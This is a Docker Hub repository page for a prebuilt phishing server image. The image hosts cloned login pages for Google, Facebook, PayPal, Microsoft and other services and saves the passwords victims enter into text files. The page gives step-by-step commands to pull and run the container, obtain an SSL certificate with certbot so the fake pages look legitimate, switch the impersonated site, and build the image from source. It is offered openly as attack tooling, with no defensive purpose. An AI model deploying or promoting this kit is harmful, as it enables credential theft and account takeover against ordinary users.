Sign inSign up

insomniaccoder/phishing

By insomniaccoder

Updated almost 6 years ago

A Docker image for on the go Phishing Server

Image
0

4.1K

insomniaccoder/phishing repository overview

phishing_cloud

Just a Docker Image for Portable Setup for phishing Targets for websites like Facebook, Google, Spotify, etc. This Image can be used on any device without any hassle of configuring or setup your system for the attack. It can even be deployed on any cloud provider.

Doceker Image Build for using any Cloud Server or Computer as a Phishing server.

Docker Repo: https://hub.docker.com/r/insomniaccoder/phishing

Refer My Blog for usage : https://harshsinghvi.github.io/blog/is-cloud-a-tool-for-hackers/

  • In this Docker image I have made installed many sites
  • for login page https://<your_domain>/<sitename>.html
  • for passwords https://<your_domain>/<sitename>.txt
  • for common passwords file https://<your_domain>/raw.txt
  • for common login page https://<your_domain>/index.html or simply https://<your_domain>
List of available sites
  • google
  • instagram
  • facebook
  • microsoft
  • linkedin
  • netflix
  • spotify
  • paypal
  • twitter
  • instafollowers
  • snapchat
  • more websites coming soon at my Docker Hub Repository.

Usage

sudo docker pull insomniaccoder/phishing:latest # or put any other supported tags
sudo docker run -d -it --name phishing_demo -p 80:80 -p 443:443 insomniaccoder/phishing # I have made this image myself for you guys

Getting SSL Certificate

sudo docker exec -it phishing_demo bash # connect to the container
ls # to see the installed sites in the container
certbot --apache --register-unsafely-without-email -d <your domain name> # complete the precess and you got the SSL certificate

To Change Default website

docker exec  phishing_demo ./change.sh <site-name> ## use default to restore else name of above mentioned supported sites

Build your own

git clone https://github.com/harshsinghvi/phishing_cloud.git
cd phishing_cloud
docker -t <image_name> .

Build Multi-Arch Images

Refer this guide

Tag summary

Content type

Image

Digest

Size

189.9 MB

Last updated

almost 6 years ago

docker pull insomniaccoder/phishing